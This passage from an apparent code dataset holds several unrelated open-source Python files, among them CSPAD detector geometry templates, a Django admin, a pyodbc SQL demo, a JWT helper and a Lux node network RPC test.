following format:\n    \n        p_x p_y p_z s_x s_y s_z f_x f_y f_z\n        ...\n    \n    and include some comments. \n    \n    \n    Parameters\n    ----------\n    detector : cspad.CSPad\n        The detector geometry to write to disk\n    \n    filename : str\n        The name of file to write. Will end in '.dtc'\n    \"\"\"\n    \n    # generate a preamble\n    preamble = \"\"\"\n# This file contains a CSPAD geometry generated by psgeom: \n# https://github.com/LinacCoherentLightSource/psgeom\n#\n# The following is a basis grid representation with the following vectors\n#\n#   p : position vector for an ASIC\n#   s : slow-scan pixel vector\n#   f : fast-scan pixel vector\n#\n# all units are mm. Each ASIC is 185 x 194 pixels.\n# See the psgeom documentation for more information.\n\n\n#   p_x   p_y   p_z   s_x   s_y   s_z   f_x   f_y   f_z\n\"\"\"\n\n    # loop over each grid element and add it to the file\n    bg = detector.to_basisgrid()\n    body = \"\"\n    \n    \n    def format(s, total_len=10):\n        \"\"\"\n        A little formatting function\n        \"\"\"\n        sf = '%.5f' % s\n        pad = total_len - len(sf)\n        if pad > 0:\n            sf = ' ' * pad + sf\n        return sf\n    \n    \n    for i in range(bg.num_grids):\n        \n        # if we're starting a new quad, note that in the file\n        if i % 16 == 0:\n            body += ('\\n# QUAD %d\\n' % (i // 16))\n        \n        # add the basis grid\n        p, s, f, shp = bg.get_grid(i)\n        strp = ' '.join( [ format(x) for x in p ] )\n        strs = ' '.join( [ format(x) for x in s ] )\n        strf = ' '.join( [ format(x) for x in f ] )\n        \n        tb = ' ' * 4\n        asic = str(i)\n        if len(asic) == 1:\n            asic = ' ' + asic\n        \n        body += (asic + tb + strp + tb + strs + tb + strf + '\\n')\n    \n    f = open(filename, 'w')\n    f.write(preamble + body)\n    f.close()\n    \n    print(\"Wrote CSPAD to text at: %s\" % filename)\n    \n    return\n    \n    \n\n# ---------- REFERENCE DATA ---------------------------------------------------\n\ngeneric_header = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n\n; clen = /LCLS/detector_1/EncoderValue\n; photon_energy = /LCLS/photon_energy_eV\n; adu_per_eV = 0.1\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\"\"\"\n\ngeneric_header_noClen = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n\n; clen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nadu_per_eV = 0.1\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\"\"\"\n\n\ncspad_header = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n; for the large CSPAD detector.\n\nclen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nres = 9097.52\nadu_per_eV = 0.00338\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\n\"\"\"\n\ncspad_header_noClen = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n; for the large CSPAD detector. Note that clen is \n; commented out.\n\n;clen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nres = 9097.52\nadu_per_eV = 0.00338\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\n\"\"\"\n\ncspad_groups = \"\"\"\n\n; The following lines define \"rigid groups\" which express the physical\n; construction of the detector. 
This is used when refining the detector\n; geometry.\n\nrigid_group_q0 = q0a0,q0a1,q0a2,q0a3,q0a4,q0a5,q0a6,q0a7,q0a8,q0a9,q0a10,q0a11,q0a12,q0a13,q0a14,q0a15\nrigid_group_q1 = q1a0,q1a1,q1a2,q1a3,q1a4,q1a5,q1a6,q1a7,q1a8,q1a9,q1a10,q1a11,q1a12,q1a13,q1a14,q1a15\nrigid_group_q2 = q2a0,q2a1,q2a2,q2a3,q2a4,q2a5,q2a6,q2a7,q2a8,q2a9,q2a10,q2a11,q2a12,q2a13,q2a14,q2a15\nrigid_group_q3 = q3a0,q3a1,q3a2,q3a3,q3a4,q3a5,q3a6,q3a7,q3a8,q3a9,q3a10,q3a11,q3a12,q3a13,q3a14,q3a15\n\nrigid_group_a0 = q0a0,q0a1\nrigid_group_a1 = q0a2,q0a3\nrigid_group_a2 = q0a4,q0a5\nrigid_group_a3 = q0a6,q0a7\nrigid_group_a4 = q0a8,q0a9\nrigid_group_a5 = q0a10,q0a11\nrigid_group_a6 = q0a12,q0a13\nrigid_group_a7 = q0a14,q0a15\nrigid_group_a8 = q1a0,q1a1\nrigid_group_a9 = q1a2,q1a3\nrigid_group_a10 = q1a4,q1a5\nrigid_group_a11 = q1a6,q1a7\nrigid_group_a12 = q1a8,q1a9\nrigid_group_a13 = q1a10,q1a11\nrigid_group_a14 = q1a12,q1a13\nrigid_group_a15 = q1a14,q1a15\nrigid_group_a16 = q2a0,q2a1\nrigid_group_a17 = q2a2,q2a3\nrigid_group_a18 = q2a4,q2a5\nrigid_group_a19 = q2a6,q2a7\nrigid_group_a20 = q2a8,q2a9\nrigid_group_a21 = q2a10,q2a11\nrigid_group_a22 = q2a12,q2a13\nrigid_group_a23 = q2a14,q2a15\nrigid_group_a24 = q3a0,q3a1\nrigid_group_a25 = q3a2,q3a3\nrigid_group_a26 = q3a4,q3a5\nrigid_group_a27 = q3a6,q3a7\nrigid_group_a28 = q3a8,q3a9\nrigid_group_a29 = q3a10,q3a11\nrigid_group_a30 = q3a12,q3a13\nrigid_group_a31 = q3a14,q3a15\n\nrigid_group_collection_quadrants = q0,q1,q2,q3\nrigid_group_collection_asics = a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,a10,a11,a12,a13,a14,a15,a16,a17,a18,a19,a20,a21,a22,a23,a24,a25,a26,a27,a28,a29,a30,a31\n\n; -----------------------------------------------\n\n\"\"\"\n\n\ncrystfel_cheetah_intensities = \"\"\"q0a0/min_fs = 0\nq0a0/min_ss = 0\nq0a0/max_fs = 193\nq0a0/max_ss = 184\n-\nq0a1/min_fs = 194\nq0a1/min_ss = 0\nq0a1/max_fs = 387\nq0a1/max_ss = 184\n-\nq0a2/min_fs = 0\nq0a2/min_ss = 185\nq0a2/max_fs = 193\nq0a2/max_ss = 369\n-\nq0a3/min_fs = 194\nq0a3/min_ss = 185\nq0a3/max_fs = 387\nq0a3/max_ss = 369\n-\nq0a4/min_fs = 0\nq0a4/min_ss = 370\nq0a4/max_fs = 193\nq0a4/max_ss = 554\n-\nq0a5/min_fs = 194\nq0a5/min_ss = 370\nq0a5/max_fs = 387\nq0a5/max_ss = 554\n-\nq0a6/min_fs = 0\nq0a6/min_ss = 555\nq0a6/max_fs = 193\nq0a6/max_ss = 739\n-\nq0a7/min_fs = 194\nq0a7/min_ss = 555\nq0a7/max_fs = 387\nq0a7/max_ss = 739\n-\nq0a8/min_fs = 0\nq0a8/min_ss = 740\nq0a8/max_fs = 193\nq0a8/max_ss = 924\n-\nq0a9/min_fs = 194\nq0a9/min_ss = 740\nq0a9/max_fs = 387\nq0a9/max_ss = 924\n-\nq0a10/min_fs = 0\nq0a10/min_ss = 925\nq0a10/max_fs = 193\nq0a10/max_ss = 1109\n-\nq0a11/min_fs = 194\nq0a11/min_ss = 925\nq0a11/max_fs = 387\nq0a11/max_ss = 1109\n-\nq0a12/min_fs = 0\nq0a12/min_ss = 1110\nq0a12/max_fs = 193\nq0a12/max_ss = 1294\n-\nq0a13/min_fs = 194\nq0a13/min_ss = 1110\nq0a13/max_fs = 387\nq0a13/max_ss = 1294\n-\nq0a14/min_fs = 0\nq0a14/min_ss = 1295\nq0a14/max_fs = 193\nq0a14/max_ss = 1479\n-\nq0a15/min_fs = 194\nq0a15/min_ss = 1295\nq0a15/max_fs = 387\nq0a15/max_ss = 1479\n-\nq1a0/min_fs = 388\nq1a0/min_ss = 0\nq1a0/max_fs = 581\nq1a0/max_ss = 184\n-\nq1a1/min_fs = 582\nq1a1/min_ss = 0\nq1a1/max_fs = 775\nq1a1/max_ss = 184\n-\nq1a2/min_fs = 388\nq1a2/min_ss = 185\nq1a2/max_fs = 581\nq1a2/max_ss = 369\n-\nq1a3/min_fs = 582\nq1a3/min_ss = 185\nq1a3/max_fs = 775\nq1a3/max_ss = 369\n-\nq1a4/min_fs = 388\nq1a4/min_ss = 370\nq1a4/max_fs = 581\nq1a4/max_ss = 554\n-\nq1a5/min_fs = 582\nq1a5/min_ss = 370\nq1a5/max_fs = 775\nq1a5/max_ss = 554\n-\nq1a6/min_fs = 388\nq1a6/min_ss = 555\nq1a6/max_fs = 581\nq1a6/max_ss = 
739\n-\nq1a7/min_fs = 582\nq1a7/min_ss = 555\nq1a7/max_fs = 775\nq1a7/max_ss = 739\n-\nq1a8/min_fs = 388\nq1a8/min_ss = 740\nq1a8/max_fs = 581\nq1a8/max_ss = 924\n-\nq1a9/min_fs = 582\nq1a9/min_ss = 740\nq1a9/max_fs = 775\nq1a9/max_ss = 924\n-\nq1a10/min_fs = 388\nq1a10/min_ss = 925\nq1a10/max_fs = 581\nq1a10/max_ss = 1109\n-\nq1a11/min_fs = 582\nq1a11/min_ss = 925\nq1a11/max_fs = 775\nq1a11/max_ss = 1109\n-\nq1a12/min_fs = 388\nq1a12/min_ss = 1110\nq1a12/max_fs = 581\nq1a12/max_ss = 1294\n-\nq1a13/min_fs = 582\nq1a13/min_ss = 1110\nq1a13/max_fs = 775\nq1a13/max_ss = 1294\n-\nq1a14/min_fs = 388\nq1a14/min_ss = 1295\nq1a14/max_fs = 581\nq1a14/max_ss = 1479\n-\nq1a15/min_fs = 582\nq1a15/min_ss = 1295\nq1a15/max_fs = 775\nq1a15/max_ss = 1479\n-\nq2a0/min_fs = 776\nq2a0/min_ss = 0\nq2a0/max_fs = 969\nq2a0/max_ss = 184\n-\nq2a1/min_fs = 970\nq2a1/min_ss = 0\nq2a1/max_fs = 1163\nq2a1/max_ss = 184\n-\nq2a2/min_fs = 776\nq2a2/min_ss = 185\nq2a2/max_fs = 969\nq2a2/max_ss = 369\n-\nq2a3/min_fs = 970\nq2a3/min_ss = 185\nq2a3/max_fs = 1163\nq2a3/max_ss = 369\n-\nq2a4/min_fs = 776\nq2a4/min_ss = 370\nq2a4/max_fs = 969\nq2a4/max_ss = 554\n-\nq2a5/min_fs = 970\nq2a5/min_ss = 370\nq2a5/max_fs = 1163\nq2a5/max_ss = 554\n-\nq2a6/min_fs = 776\nq2a6/min_ss = 555\nq2a6/max_fs = 969\nq2a6/max_ss = 739\n-\nq2a7/min_fs = 970\nq2a7/min_ss = 555\nq2a7/max_fs = 1163\nq2a7/max_ss = 739\n-\nq2a8/min_fs = 776\nq2a8/min_ss = 740\nq2a8/max_fs = 969\nq2a8/max_ss = 924\n-\nq2a9/min_fs = 970\nq2a9/min_ss = 740\nq2a9/max_fs = 1163\nq2a9/max_ss = 924\n-\nq2a10/min_fs = 776\nq2a10/min_ss = 925\nq2a10/max_fs = 969\nq2a10/max_ss = 1109\n-\nq2a11/min_fs = 970\nq2a11/min_ss = 925\nq2a11/max_fs = 1163\nq2a11/max_ss = 1109\n-\nq2a12/min_fs = 776\nq2a12/min_ss = 1110\nq2a12/max_fs = 969\nq2a12/max_ss = 1294\n-\nq2a13/min_fs = 970\nq2a13/min_ss = 1110\nq2a13/max_fs = 1163\nq2a13/max_ss = 1294\n-\nq2a14/min_fs = 776\nq2a14/min_ss = 1295\nq2a14/max_fs = 969\nq2a14/max_ss = 1479\n-\nq2a15/min_fs = 970\nq2a15/min_ss = 1295\nq2a15/max_fs = 1163\nq2a15/max_ss = 1479\n-\nq3a0/min_fs = 1164\nq3a0/min_ss = 0\nq3a0/max_fs = 1357\nq3a0/max_ss = 184\n-\nq3a1/min_fs = 1358\nq3a1/min_ss = 0\nq3a1/max_fs = 1551\nq3a1/max_ss = 184\n-\nq3a2/min_fs = 1164\nq3a2/min_ss = 185\nq3a2/max_fs = 1357\nq3a2/max_ss = 369\n-\nq3a3/min_fs = 1358\nq3a3/min_ss = 185\nq3a3/max_fs = 1551\nq3a3/max_ss = 369\n-\nq3a4/min_fs = 1164\nq3a4/min_ss = 370\nq3a4/max_fs = 1357\nq3a4/max_ss = 554\n-\nq3a5/min_fs = 1358\nq3a5/min_ss = 370\nq3a5/max_fs = 1551\nq3a5/max_ss = 554\n-\nq3a6/min_fs = 1164\nq3a6/min_ss = 555\nq3a6/max_fs = 1357\nq3a6/max_ss = 739\n-\nq3a7/min_fs = 1358\nq3a7/min_ss = 555\nq3a7/max_fs = 1551\nq3a7/max_ss = 739\n-\nq3a8/min_fs = 1164\nq3a8/min_ss = 740\nq3a8/max_fs = 1357\nq3a8/max_ss = 924\n-\nq3a9/min_fs = 1358\nq3a9/min_ss = 740\nq3a9/max_fs = 1551\nq3a9/max_ss = 924\n-\nq3a10/min_fs = 1164\nq3a10/min_ss = 925\nq3a10/max_fs = 1357\nq3a10/max_ss = 1109\n-\nq3a11/min_fs = 1358\nq3a11/min_ss = 925\nq3a11/max_fs = 1551\nq3a11/max_ss = 1109\n-\nq3a12/min_fs = 1164\nq3a12/min_ss = 1110\nq3a12/max_fs = 1357\nq3a12/max_ss = 1294\n-\nq3a13/min_fs = 1358\nq3a13/min_ss = 1110\nq3a13/max_fs = 1551\nq3a13/max_ss = 1294\n-\nq3a14/min_fs = 1164\nq3a14/min_ss = 1295\nq3a14/max_fs = 1357\nq3a14/max_ss = 1479\n-\nq3a15/min_fs = 1358\nq3a15/min_ss = 1295\nq3a15/max_fs = 1551\nq3a15/max_ss = 
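# The long crystfel_cheetah_intensities block above follows a regular
# pattern: each quad occupies a 388-pixel-wide fast-scan stripe, each ASIC is
# 194 x 185 pixels, and ASIC pairs stack along slow-scan. A sketch that
# regenerates the same entries (illustration only, not used by psgeom):
def cheetah_panel_entry(q, a):
    min_fs = 388 * q + 194 * (a % 2)
    min_ss = 185 * (a // 2)
    return ('q%da%d/min_fs = %d\nq%da%d/min_ss = %d\n'
            'q%da%d/max_fs = %d\nq%da%d/max_ss = %d'
            % (q, a, min_fs, q, a, min_ss,
               q, a, min_fs + 193, q, a, min_ss + 184))

print(cheetah_panel_entry(0, 0))   # reproduces the q0a0 block above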
1479\"\"\"\n\n\n","repo_name":"slaclab/psgeom","sub_path":"psgeom/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":49340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39383483815","text":"from datetime import datetime, timedelta\nimport pandas as pd\n\n\ndef fill_up_missing_dates(dates):\n dat = list(map(lambda x: datetime.strptime(x, '%d.%m.%Y'), dates))\n result = []\n for d in pd.date_range(min(dat), max(dat)):\n result.append(d.strftime('%d.%m.%Y'))\n return result\n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_3/Module_3_4/Module_3_4_21.py","file_name":"Module_3_4_21.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644696814","text":"import json\nimport xml.etree.ElementTree as ET\n\nfrom cafe.engine.models.base import AutoMarshallingModel\nfrom cloudcafe.compute.common.constants import Constants\n\n\nclass GetConsoleOutput(AutoMarshallingModel):\n \"\"\"\n Get Console Output Request Object\n \"\"\"\n\n def __init__(self, length):\n self.length = length\n\n def _obj_to_json(self):\n json_dict = {\"length\": str(self.length)}\n return json.dumps({\"os-getConsoleOutput\": json_dict})\n\n def _obj_to_xml(self):\n xml = Constants.XML_HEADER\n element = ET.Element(\"os-getConsoleOutput\")\n element.set(\"length\", str(self.length))\n xml += ET.tostring(element)\n return xml\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/compute/extensions/console_output_api/models/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32270359927","text":"from django.contrib import admin\n\n# Register your models here.\nfrom mapmaker.models import City,Markup\n\nclass CityAdmin(admin.ModelAdmin):\n exclude = ('client',)\n list_display = ('location', 'name',)\n\n def save_model(self, request, obj, form, change):\n if not change:\n obj.client = request.user\n obj.save()\n\n def get_queryset(self, request):\n qs = super(CityAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(client=request.user)\n\nadmin.site.register(City,CityAdmin)\n\nclass MarkupAdmin(admin.ModelAdmin):\n # exclude = ('client',)\n\n # users can only see their own (unless superuser)\n def get_queryset(self, request):\n qs = super(MarkupAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(client=request.user)\n\nadmin.site.register(Markup,MarkupAdmin)\n","repo_name":"nepakala/hostgator-django","sub_path":"database/mapmaker/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35936528580","text":"import argparse\nfrom pyhsm.hsmclient import HsmClient\n\n\nparser = argparse.ArgumentParser(\"listslots\", description=\"List HSM slots.\")\nparser.add_argument(\"-p11\", dest=\"module\", required=True,\n help=\"Full path to HSM's PKCS#11 shared library.\")\nargs = parser.parse_args()\n\n# note: listing slot information does not require a login\n# example connects to the open source softHSM v2\nwith HsmClient(pkcs11_lib=args.module) as c:\n for s in c.get_slot_info():\n print(\"----------------------------------------\")\n 
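# Usage sketch for the fill_up_missing_dates() sample earlier in this file:
# pd.date_range is inclusive on both ends, so gaps between the min and max
# dates are filled day by day (example dates are hypothetical).
from datetime import datetime
import pandas as pd

def fill_up_missing_dates(dates):
    dat = [datetime.strptime(x, '%d.%m.%Y') for x in dates]
    return [d.strftime('%d.%m.%Y') for d in pd.date_range(min(dat), max(dat))]

print(fill_up_missing_dates(['01.03.2021', '04.03.2021']))
# -> ['01.03.2021', '02.03.2021', '03.03.2021', '04.03.2021']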
print(s.to_string())\n","repo_name":"bentonstark/py-hsm","sub_path":"examples/listslots.py","file_name":"listslots.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"37"} +{"seq_id":"38731651092","text":"from turtle import clear\r\nimport pyodbc\r\n\r\nconn = pyodbc.connect(\r\n \"Driver={SQL Server};\"\r\n \"Server=GWTN141-10;\"\r\n \"Database=AdventureWorks2019;\"\r\n \"Trust_Connection=yes;\"\r\n)\r\n\r\nclass sqljson:\r\n cursor = conn.cursor()\r\n def __init__(self, connectdb):\r\n self.connectdb = connectdb \r\n\r\n def read(self):\r\n print(\"Read\")\r\n sqljson.cursor.execute(\"select top 3 BusinessEntityID, FirstName, MiddleName, LastName from [Person].[Person]\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n\r\n def likeqry(self):\r\n print(\"Like Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 [BusinessEntityID], [JobTitle] FROM [HumanResources].[Employee] e WHERE JobTitle LIKE 'Design%'\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n \r\n def INqry(self):\r\n print(\"In Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 [BusinessEntityID],JobTitle FROM [HumanResources].[Employee] e WHERE JobTitle in ('Engineering Manager','Senior Tool Designer')\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def betweenqry(self):\r\n print(\"Between Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 SalesOrderID, OrderDate, DueDate FROM Sales.SalesOrderHeader WHERE [OrderDate] BETWEEN '4/16/2011' AND '12/15/2011'\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def lessthanqry(conn):\r\n print(\"Between Query\")\r\n sqljson.cursor.execute(\"SELECT BusinessEntityID, FirstName, LastName FROM [Person].[Person] WHERE BusinessEntityID <= 10\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def joinqry(conn):\r\n print(\"Join Tables\")\r\n sqljson.cursor.execute(\"SELECT top 5 E.NationalIDNumber, E.JobTitle, P.FirstName, P.LastName FROM [HumanResources].[Employee] as E INNER JOIN [Person].[Person] as P on E.BusinessEntityID = P.BusinessEntityID\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def ConverttOjson(conn):\r\n print(\"Convert to Json\")\r\n sqljson.cursor.execute(\"select top 3 BusinessEntityID, FirstName, MiddleName, LastName from [Person].[Person] For JSON PATH, ROOT('Person')\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n \r\n def queryjson(self):\r\n print(\"Query Json Data\")\r\n sqljson.cursor.execute('''DECLARE @json NVARCHAR(1000)\r\n SELECT @json = N'{\r\n \"Person\": [\r\n {\r\n \"BusinessEntityID\": 285,\r\n \"FirstName\": \"Syed\",\r\n \"LastName\": \"Abbas\"\r\n },\r\n {\r\n \"BusinessEntityID\": 293,\r\n \"FirstName\": \"Catherine\",\r\n \"LastName\": \"Abel\"\r\n },\r\n {\r\n \"BusinessEntityID\": 295,\r\n \"FirstName\": \"Kim\",\r\n \"LastName\": \"Abercrombie\"\r\n }\r\n ]\r\n }'\r\n select BusinessEntityID, FirstName, LastName\r\n FROM OPENJSON(@json, '$.Person')\r\n WITH(\r\n BusinessEntityID INT,\r\n FirstName varchar(500),\r\n LastName varchar(500)\r\n ) as Person ''')\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n\r\n \r\nobj1 = sqljson(\"converter\")\r\ntestprog=int(input(\"Enter any value to test options or 0 to end::\"))\r\nwhile(testprog!=0):\r\n print(\"Sql and Json Queries Options \\n1. Read Sql Server Data \\n2. Like Query\")\r\n print(\"3. IN Query \\n4. Between Query \\n5. Logical Operation Query\")\r\n print(\"6. Join Query \\n7. 
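# The sqljson sample above builds its SQL as string literals; when a query
# takes input, pyodbc's '?' placeholders are the idiomatic way to pass it
# without SQL injection. A hedged sketch (table and columns taken from the
# sample, an open cursor assumed to exist):
def person_by_id(cursor, business_entity_id):
    cursor.execute(
        "select BusinessEntityID, FirstName, LastName "
        "from Person.Person where BusinessEntityID = ?",
        business_entity_id)
    return cursor.fetchone()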
Convert to Json \\n8. Query Json\")\r\n option=int(input(\"Enter your choice of query::\"))\r\n if(option==1):\r\n obj1.read()\r\n elif(option==2):\r\n obj1.likeqry()\r\n elif(option==3):\r\n obj1.INqry()\r\n elif(option==4):\r\n obj1.betweenqry()\r\n elif(option==5):\r\n obj1.lessthanqry()\r\n elif(option==6):\r\n obj1.joinqry()\r\n elif(option==7):\r\n obj1.ConverttOjson()\r\n elif(option==8):\r\n obj1.queryjson()\r\n testprog=int(input(\"\\n Enter any value to test options or 0 to end::\"))","repo_name":"comptechric/monolithicSqlj","sub_path":"monolithicSqljson.py","file_name":"monolithicSqljson.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42425548490","text":"from datetime import timedelta, datetime\n\nfrom jose import jwt as jose_jwt\nfrom jose.exceptions import JWTError\n\nfrom app.core.config import settings\nfrom app.core.exceptions import InvalidCredentials\nfrom app.schemas.token import TokenPayload\n\n\nclass JWT:\n def create_access_token(self, subject: str, expires_delta: timedelta = None) -> str:\n if expires_delta:\n expires = datetime.utcnow() + expires_delta\n else:\n expires = datetime.utcnow() + timedelta(\n minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES\n )\n token = jose_jwt.encode(\n {\"exp\": expires, \"sub\": str(subject)},\n str(settings.SECRET_KEY),\n algorithm=settings.ALGORITHM,\n )\n return token\n\n def decode_access_token(self, token: str) -> TokenPayload:\n try:\n payload = jose_jwt.decode(\n token, str(settings.SECRET_KEY), algorithms=[settings.ALGORITHM]\n )\n return TokenPayload(**payload)\n except JWTError:\n raise InvalidCredentials(\"Invalid access token\")\n\n\njwt = JWT()\n","repo_name":"Simon3640/cotizadorV2","sub_path":"app/infraestructure/security/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3259979697","text":"\"\"\"Supported Keras Layers are defined in this module.\"\"\"\nfrom keras import layers\n\n# List of currently supported Keras Layers\nSUPPORTED_LAYERS = [\n layers.Dense,\n layers.Conv2D\n]\n\n\ndef is_supported_layer(layer):\n \"\"\"This function tests if a layer is officially supported by this framework.\n\n Args:\n layer: Layer to test\n Returns:\n True if supported. 
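# Round-trip sketch for the JWT helper above, using a throwaway secret; the
# jose.jwt.encode/decode signatures match what the class uses, and
# python-jose accepts a datetime for the 'exp' claim.
from datetime import datetime, timedelta
from jose import jwt as jose_jwt

secret, algorithm = 'change-me', 'HS256'          # hypothetical settings
claims = {'sub': '42', 'exp': datetime.utcnow() + timedelta(minutes=5)}
token = jose_jwt.encode(claims, secret, algorithm=algorithm)
payload = jose_jwt.decode(token, secret, algorithms=[algorithm])
assert payload['sub'] == '42'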
False if not supported.\n \"\"\"\n for supported_layer in SUPPORTED_LAYERS:\n if isinstance(layer, supported_layer):\n return True\n return False\n","repo_name":"SirBubbls/condense","sub_path":"condense/keras/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11319389008","text":"from collections import Counter\nimport matplotlib.pyplot as plt\n\nnum_friends = [100,49,41,40,40,40,40,40]\nfriend_counts = Counter(num_friends)\n# The highest number is 100\nxs = range(101)\nys= [friend_counts[x] for x in xs]\n\nplt.bar(xs,ys)\nplt.axis([0,50,0,25])\nplt.title(\"Histogram of number of friends\")\nplt.xlabel(\"Number of friends\")\nplt.ylabel(\"Number of members\")\nplt.show()","repo_name":"dadalib/data_science_exercices","sub_path":"data_visualisation_chp5_1.py","file_name":"data_visualisation_chp5_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10463315404","text":"import time\n\nfrom test_framework.test_framework import LuxTestFramework\nfrom test_framework.util import (\n assert_equal,\n assert_raises_rpc_error,\n connect_nodes_bi,\n p2p_port,\n)\n\nclass NetTest(LuxTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 2\n\n def run_test(self):\n self._test_connection_count()\n self._test_getnettotals()\n self._test_getnetworkinginfo()\n self._test_getaddednodeinfo()\n self._test_getpeerinfo()\n\n def _test_connection_count(self):\n # connect_nodes_bi connects each node to the other\n assert_equal(self.nodes[0].getconnectioncount(), 2)\n\n def _test_getnettotals(self):\n # check that getnettotals totalbytesrecv and totalbytessent\n # are consistent with getpeerinfo\n peer_info = self.nodes[0].getpeerinfo()\n assert_equal(len(peer_info), 2)\n net_totals = self.nodes[0].getnettotals()\n assert_equal(sum([peer['bytesrecv'] for peer in peer_info]),\n net_totals['totalbytesrecv'])\n assert_equal(sum([peer['bytessent'] for peer in peer_info]),\n net_totals['totalbytessent'])\n # test getnettotals and getpeerinfo by doing a ping\n # the bytes sent/received should change\n # note ping and pong are 32 bytes each\n self.nodes[0].ping()\n time.sleep(0.1)\n peer_info_after_ping = self.nodes[0].getpeerinfo()\n net_totals_after_ping = self.nodes[0].getnettotals()\n for before, after in zip(peer_info, peer_info_after_ping):\n assert_equal(before['bytesrecv_per_msg']['pong'] + 32, after['bytesrecv_per_msg']['pong'])\n assert_equal(before['bytessent_per_msg']['ping'] + 32, after['bytessent_per_msg']['ping'])\n assert_equal(net_totals['totalbytesrecv'] + 32*2, net_totals_after_ping['totalbytesrecv'])\n assert_equal(net_totals['totalbytessent'] + 32*2, net_totals_after_ping['totalbytessent'])\n\n def _test_getnetworkinginfo(self):\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], True)\n assert_equal(self.nodes[0].getnetworkinfo()['connections'], 2)\n\n self.nodes[0].setnetworkactive(False)\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], False)\n timeout = 3\n while self.nodes[0].getnetworkinfo()['connections'] != 0:\n # Wait a bit for all sockets to close\n assert timeout > 0, 'not all connections closed in time'\n timeout -= 0.1\n time.sleep(0.1)\n\n self.nodes[0].setnetworkactive(True)\n connect_nodes_bi(self.nodes, 0, 1)\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], True)\n 
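# Usage sketch for the is_supported_layer() helper above (assumes that
# support module is importable; constructor arguments are hypothetical but
# valid Keras calls):
from keras import layers

print(is_supported_layer(layers.Dense(8)))        # True: in SUPPORTED_LAYERS
print(is_supported_layer(layers.Dropout(0.5)))    # False: not listed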
assert_equal(self.nodes[0].getnetworkinfo()['connections'], 2)\n\n def _test_getaddednodeinfo(self):\n assert_equal(self.nodes[0].getaddednodeinfo(), [])\n # add a node (node2) to node0\n ip_port = \"127.0.0.1:{}\".format(p2p_port(2))\n self.nodes[0].addnode(ip_port, 'add')\n # check that the node has indeed been added\n added_nodes = self.nodes[0].getaddednodeinfo(ip_port)\n assert_equal(len(added_nodes), 1)\n assert_equal(added_nodes[0]['addednode'], ip_port)\n # check that a non-existant node returns an error\n assert_raises_rpc_error(-24, \"Node has not been added\",\n self.nodes[0].getaddednodeinfo, '1.1.1.1')\n\n def _test_getpeerinfo(self):\n peer_info = [x.getpeerinfo() for x in self.nodes]\n # check both sides of bidirectional connection between nodes\n # the address bound to on one side will be the source address for the other node\n assert_equal(peer_info[0][0]['addrbind'], peer_info[1][0]['addr'])\n assert_equal(peer_info[1][0]['addrbind'], 